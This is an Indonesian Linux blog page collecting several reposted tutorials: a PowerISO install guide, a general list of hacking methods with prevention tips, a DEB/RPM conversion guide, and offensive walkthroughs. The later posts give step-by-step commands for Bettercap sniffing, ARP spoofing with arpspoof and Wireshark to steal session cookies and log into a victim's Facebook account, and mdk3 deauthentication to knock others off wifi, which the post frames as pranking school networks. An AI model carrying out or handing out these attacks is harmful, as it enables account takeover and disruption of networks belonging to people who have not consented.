Cara Install Power ISO di KALI Linux dan Distro Lainnya

squadlinuxer -
http://2.bp.blogspot.com/-Q7WxETT_uQE/VexGZwTgOjI/AAAAAAAAAS8/hpehNR0kuLc/s1600/powerISO-linux.png 

Pada dasarnya, Power ISO di Linux dan di Windows itu sama. Bedanya jika di Windows menggunakan tampilan grafis dan mudah di gunakan, di Linux kita harus menggunakan command text. Akan tetapi, jika di windows berbayar, di Linux kita bisa mendapatkan gratis. Sebenarnya di Windows adalah shareware yang berarti pengguna bisa menggunakan trialnya lalu di suruh bayar untuk menggunakan versi full nya.

Cara Installasi:

-Download file nya di situs resmi Power ISO
> Menggunakan Browser: Klik disini

> Menggunakan Terminal:
 Masuk terminal lalu copas kode dibawah ini:

 wget -O poweriso-1.3.tar.gz http://www.poweriso.com/poweriso-1.3.tar.gz
 http://4.bp.blogspot.com/-WB7tc2XJ5iA/Vew8FNKHtRI/AAAAAAAAASI/eWoa9prhIhU/s1600/poweriso1.png


Setelah itu masuk folder Power ISO tadi:

Esktrak PowerISO dengan perintah: sudo tar -xzvf poweriso-1.3.tar.gz

3. Pindahkan hasil ekstrak tadi ke direktori: /usr/local/bin
 
Cara Install PowerISO di Kali Linux
 
Perintah terminal: mv poweriso /usr/local/bin

4. Masuk pada directori /usr/local/bin dengan cara cd /usr/local/bin
5. Kemudian berikan hak akses pada poweriso dengan perintah berikut: 
    command: chmod +x poweriso
6. Sekarang PowerISO dapat dijalankan melalui terminal dengan perintah: poweriso
Cara Install PowerISO di Kali Linux
 
Gunakan: poweriso -? untuk mengetahui petunjuk penggunaan. 
 
7. Done !!!

Sumber: http://www.kalongganteng.com/2015/09/cara-install-poweriso-di-linux.html

Pahami Cara Hacker Menjalankan Aksinya dan Pencegahan!



Hacker adalah sekelompok atau seseorang yang bisa masuk ke sistem orang lain, tanpa merusaknya. Seorang hacker biasanya orang yang cerdas, mereka bisa membaca situasi dan kelemahan target dalam jangkauan yang luas maupun sempit.

Pernah nonton film Life free or Die Hard atau film Who Am I - No system is safe? didalam film tersebut, di ceritakan hacker menyerang kota dan bisa mengendalikan listrik, nuklir dan alat-alat pemerintahan lainnya. Bahkan di dalam film Lie Free or  Die Hard, hacker bisa mengontrol lalu lintas dan komunikasi antara pesawat jet ke pusat pengendali, serem kan?. Nggak seserem itu keless!

Tapi, film tetaplah film nggak usah ingin jadi seperti mereka, nggak ada untungnya lebih baik jadi orang yang baik aja, hehehe...

Di dalam dunia hacking juga mengenal metode jadi seorang hacker tidak asal keluar-masuk target seenak jidat mereka, mereka harus melalui proses yang cukup rumit, adapun proses itu kita bisa menghindarinya kok. Ada beberapa metode yang sering sekali di pakai hacker dalam aksinya, contohnya: Phising.

berikut ini beberapa cara hacker untuk bisa mengeksekusi target beserta pencegahan:

1. Phising

Phising adalah teknik dimana tersangka 'memancing' target untuk menulis data-data yang di butuhkan hacker, contohnya: password dll. mereka akan membuat sebuah jebakan yang mana jebakan itu mirip sekali dengan yang asli. Tahun 2010 dulu, lagi gencar-gencarnya phising facebook, jadi mereka membuat login page mirip dengan facebook yang tujuannya agar korban mengira bahwa itu login facebook asli, lah kalau yang di buat jebakan login ebanking gimana? bahaya tuh.

Pencegahan:

Hati-hati jika seseorang memberi Anda sebuah Link yang nggak jelas asal-usulnya. Selalu perhatikan link yang Anda tuju, jangan sampai Anda masuk ke jebakan mereka.


2. Spoofing

Metode spoofing biasanya dilakukan pelaku hanya dalam cangkupan lokal saja, itulah kenapa jaringan lokal dikatakan jaringan paling rawan dan tidak di anjurkan membuka akun-akun penting dalam jaringan lokal publik.

Pencegahan:

Hindari membuka akun penting pada jaringan publik yang berskala LAN (Local Area Network).


3. MiTM (Man in The Middle)

Mungkin lebih sering kita mendengarnya dengan istilah Sadap. Yap, metode ini adalah metode penyadapan pada suatu korban sehingga pelaku bisa mengetahui apa yang sedang dilakukan korban saat itu.

Pencegahan:

Lagi-lagi be careful dengan jaringan Lokal Publik.


4. Social Engineering

Metode ini memanfaatkan kelemahan dan ketidak tahuan terhadap korban, sehingga pelaku dengan mudah menggasap akun korban karena ulang korban sendiri. Contoh: Pelaku mengirim sebuah gambar lucu yang mendorong korban untuk membuka nya , setelah di klik ternyata gambar itu mengandung virus dan masuk ke komputer korban.

Pencegahan:

Hati-hati dengan orang asing, waspadai jika ada yang mengirim sesuatu janggal dan update selalu antivirus.


5. Evil Twin

Metode ini bisa di sebut juga dengan phising AP. Karena tersangka memasang 2 login page kepada AP korban, sehingga korban tidak bisa login dengan AP yang asli, mau tidak mau korban harus login ke AP palsu milik tersangka.

Pencegahan:

Hati-hati dengan cara satu ini, karena sulit dideteksi bagi pemilik wifi.usahakan update secara berkala password dan type keamanan wifi anda.


6. Brute force

Cara paling banyak memakan waktu untuk para peretas,karena cara ini adalah sama saja, mencoba satu per satu password yang sudah di list file tertentu, biasanya bergiga-giga dan cara ini akan memakan waktu sangat amat lama banget! bisa ratusan bahkan ribuan tahun. YAP, TAHUN. tergantung keunikan password target.

pencegahan:

gunakan password yang susah di tebak namun mudah di ingat oleh Anda, gunakan karakter unik dalam password tersebut.


7. DDOS (Denial of Service Attack)

Cara satu ini bisa disebut dengan 'tawuran' karena cara ini hanya bisa dilakukan dengan banyak komputer yang melakukan kiriman data sebanyak mungkin ke target sehingga target menjadi down.

Pencegahan:

Entahlah, ini biasanya terjadi pada situs-situs besar bukan pengguna seperti kita. tapi kemungkinan terjadi pada kita juga ada walaupun kecil.



Mungkin itu saja, ada yang mau menambahkan? intinya jika kita merawat sistem kita secara baik dan benar, serangan-serangan seperti itu bisa kok kita minimalisir, dan juga menambah pengetahuan kita terhadap serangan itu tentunya. Oke, got it? see yaa

Cara Convert File DEB ke RPM atau RPM ke DEB di Ubuntu Menggunakan Alien

Untuk kamu pengguna Linux, yang benar-benar pengguna Linux. Pasti tau apa itu file RPM dan file DEB. yap, RPM adalah RedHat Package Manager paket file ini hanya bisa di gunakan pada Linux RedHat atau turunannya, seperti Fedora dan lain-lain. Untuk file DEB adalah file yang hanya di gunakan pada Linux Debian dan turunannya, Ubuntu misalnya.

Kita tidak bisa menggunakan file DEB ke Redhat dan turunannya, begitu juga sebaliknya.

Untuk itu, kita perlu meng-convert-nya. Kita bisa mengkonversi paket file ini dengan menggunakan Alien di ubuntu, dengan aplikasi ini kita bisa mengubah file RPM ke DEB atau sebaliknya, aplikasi ini berjalan di mode console.

Installasi Alien.

yang harus kamu lakukan pertama adalah menginstall alien:

sudo apt-get install alien


Konversi DEB ke RPM atau RPM ke DEB

Untuk mengubah paket file, dari deb ke rpm kita gunakan perintah ini:
sudo alien -d namafile.rpm
Untuk mengubah file dari rpm ke deb kita gunakan perintah ini:
sudo alien -r namafile.deb

Selain itu, kita juga dapat mengkonversi dari SLP, LSB, Slackware TGZ packages.


Bettercap, Tools Man in The Middle (MiTM)

Hallo, setelah kemarin saya memposting artikel tentang - Cara Menggunakan Wifi.id Secara Gratis tanpa username/password - Sekarang saya datang dengan tutorial baru (bagi yang baru tau).

Pertama mari kita bahas dulu apa itu MiTM:

Sebuah serangan MITM adalah jenis serangan cyber di mana seseorang berbahaya mendaftarkan dirinya sendiri dalam sebuah percakapan antara dua pihak, impersonates kedua belah pihak dan memperoleh akses terhadap informasi bahwa kedua pihak sedang berusaha untuk mengirim satu sama lain.


Dari gambar di atas sudah jelas kan? gimana cara kerja MiTM.

Nah, disini saya akan share tools yang powerful untuk melancarkan aksi MiTM. Keuntungan menggunakan Tools ini adalah bisa meng-inject cookies dari korban, jadi kita bisa membuka segala akun korban tanpa perlu tahu passwordnya (jika ada cookies disana).

Cara ini bersumber dari forum IBT (Indonesian Backtrack Team) dan saya hanya re-share, dan di tulis oleh akun Gnome_Selpa. link sumber ada dibawah.

Sebelumnya kita harus tahu, tool ini dibuat oleh Simone 'evilsocket' Margaritelli dan membagikannya secara gratis melalui akun github-nya di https://github.com/evilsocket/bettercap

Berikut cara install dan penggunaannya:

1 .Installasi, Pilih salah satu saja, dari Source atau dari GEM:

Install dari Source:
Masuk terminal, lalu ketik:
root@gnomeselpa:~# apt-get install ruby-dev libpcap-dev
root@gnomeselpa:~# git clone https://github.com/evilsocket/bettercap bettercap
root@gnomeselpa:~# cd bettercap
root@gnomeselpa:~# gem clean bettercap.gemspec
root@gnomeselpa:~# gem build bettercap.gemspec
root@gnomeselpa:~# gem install bettercap*.gem

Install dari GEM:
Masuk terminal, lalu ketik:
root@gnomeselpa:~# apt-get install ruby-dev libpcap-dev
root@gnomeselpa:~# gem install bettercap

 

2. Cara Menggunakan Bettercap

Ketik command ini, di terminal:
root@gnomeselpa:~# bettercap -X -L -I wlan0

 


 


Nah lihat, Korban lagi sedang membuka apa tuh? Kita bisa tahu kan? itulah kenapa teknik ini disebut Man in The Middle yang artinya Seseorang berada di tengah. Teknik ini bisa sangat bermanfaat kalau di padukan dengan Cookies injector, disini tutorialnya

sumber: https://indonesianbacktrack.or.id/forum/thread-6448.html

Cookie Injector, Untuk Masuk ke Segala Akun Orang Lain.

Re-Share, dari IBTeam Penulis Kresna, sumber :https://indonesianbacktrack.or.id/forum/showthread.php?tid=4269

MiTM apa sih?
coba lihat gambar ini saja, saya yakin kamu bisa paham.



sudah ngarti kan? Nah sekarang, saya mau share tutorial dari rekan kita, member IBTeam, sumber dan penulis sudah tertera di awal.

Tools yang dibutuh kan adalah :
-> Browser Mozilla Firefox
-> Greasemonkey (Addons firefox) https://addons.mozilla.org/en-US/firefox...asemonkey/
-> Cookie Injector http://dustint.com/post/12/cookie-inject...easemonkey
-> Arpspoof
-> Nmap / Ether Ape / sejenis IP scanner lainnya, tp dalam tutor ini ane menggunakan ether ape GUI .

langsung saja ..
 

1. Pertama Scanning IP address yang hidup dulu .. (using Ether Ape GUI)
Applications -> Internet -> Ether Ape (as Root) . Atur Capture Interfacenya dengan Wlan0 atau yang Eth0 jg bisa:


 

Setelah selesai maka akan ditampilkan IP-IP yg berada dalam subnet kita.

 

nah disana sudah bisa dilihat, ada 3 buah IP numerik . 192.168.1.1 , 192.168.1.3 , 192.168.1.5 .

192.168.1.1 adalah Ip router saya (target2).
192.168.1.5 adalah target saya (target1).
192.168.1.3 adalah Ip saya.

2. Kedua , Setelah mendapat target . kita buka terminal pertama.

sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

 


3. Ketiga, saatnya serangan MITM dengan arpspoof. Ketik diterminal :
 sudo arpspoof -i [interface] -t [target] [Gateway]



[interface] saya menggunakan wlan0
[target] target saya adalah 192.168.1.5
[Gateway] gatway saya adalah 192.168.1.1

Lalu buka terminal baru lalu isi:
sudo arpspoof -i [interface] -t [Gateway] [target]



[interface] saya menggunakan wlan0
[target] target saya adalah 192.168.1.5
[Gateway] gatway saya adalah 192.168.1.1
masih tetep sama kayak diatas, tp beda posisi . ini berfungsi untuk kita sebagai orang yg ketiga.

Lalu,  Install Greasemonkey dan cookie injector di browser mozilla
kita skip aja install graesemonkey, gampang kok .. https://addons.mozilla.org/en-US/firefox...asemonkey/
setelah install greasemonkey, lebih baik restart browsernya dulu biar gk error.
nah, sekarang install cookie injectornya . http://dustint.com/post/12/cookie-inject...easemonkey pilih tulisan INSTALL pojok kanan atas.



untuk mengecek aktif tidaknya cookie injectornya , tekan ALT+C . klo tidak bisa coba restart mozillanya. sepp langkah ke 4 selesai, maju kelangkah berikutnya..

lalu , Buka wireshark . lewat terminal, ketik: wireshark





Pada kolom yang warna hitam, yaa tepatnya itu adalah tempat cookienya. cookie yang ingin kita ambil. Caranya klik kanan pada kolom tersebut : copy -> bytes -> Printable Text Only



Buka browser mozilla anda...
-buka halaman facebook .. lalu tekan tombol ALT+C untuk mengaktifkan cookie injectornya ..
-lalu paste kan Cookie yang kita copy tadi pada langkah ke 5. dan klik OK .




Ini langkah terakhir. Reload Page Facebook anda.. dan anda akan masuk ke facebook korban anda :D



nb : Perhatikan cookie pada langkah ke 5 , lihat kolom destination dan source .
destination adalah tempat tujuan dari asal IP tersebut , sedangkan
source adalah Asal IP tersebut . Perhatikan IP facebook, twitter dln . klo kalian ambil destinationya facebook tapi dibrowser bukanya twitter yaa gak bakal mau ke inject cookienya. jadi musti sama dengan destination yang cookienya kita ambil..


sumber : https://indonesianbacktrack.or.id/forum/showthread.php?tid=4269

Cara Memutus Koneksi Internet Orang Lain, Menggunakan MDK3 KALI Linux

Re-Share kembali. ini adalah tutorial hasil re-share saya yang ketiga, setalah sebelumnya saya posting: cara hack cctv dan cara hack wifi.id

Gregetan gara-gara koneksi wifi dirumah makin lelat karena ada "pengguna gelap"? . atau pengen usil ketika pakai wifi sekolah? , yasudah langsung saja caranya dibawah ini:
 
Pertama, siapkan bahan-bahannya dahulu yaa, pastikan OS laptop/komputer kamu adalah KALI Linux. Kenapa harus kali linux? sebenarnya nggak harus kali linux sih, cuma kita butuh tools yang ada di kali linux, kalau kamu pakai ubuntu juga bisa kok, asal sudah terinstall tools kali Linux disana.

Oke, saya anggap kalian sudah punya alat-alatnya yaah:


1. Kali Linux (tools)
2. Koneksi Wifi
3. Mac Address korban, cara ngedapetinnya gimana? scan saja pakai nmap atau wireshark juga bisa.

Langkah-langkahnya:

1. Buka terminal lalu ketik: 
airmon-ng start wlan0



 

2. Cek Mac Address kamu, dengan cara mengetik:

 ifconfig wlan0

Copy Mac Address kamu, gunannya untuk memasukan ke daftar Whitelist (yang boleh terkoneksi)





 

3. Lalu masukan Mac Address kamu ke daftar Mac Address yang di perbolehkan untuk terkoneksi:

echo (mac:address kamu) >> w.txt

contoh :

echo 14:cc:20:13:0a:10 >> w.txt


*w.txt adalah Whitelist 



4. RUN That:
 
mdk3 mon0 d -w w.txt

Nah, sekarang mari kita blacklist Mac Address yang ingin kita usilin, atau pengguna gelap wifi kita, caranya:

1. ketik ini di terminal

echo (mac:address:korban) >> b.txt

contoh:
echo 24:EC:99:2E:04:0A >> b.txt

*b.txt adalah Blacklist, jika ingin memasukan Mac Address lain, lakukan hal sama, atau bisa juga secara manual memasukannya kesana:




2. RUN THAT:
mdk3 mon0 d -b b.txt




Sekarang Ngaciirr dehh, internetnyaaa..



sumber: http://rextor404.blogspot.co.id/2015/07/memotong-koneksi-orang-lain-emnggunakan.html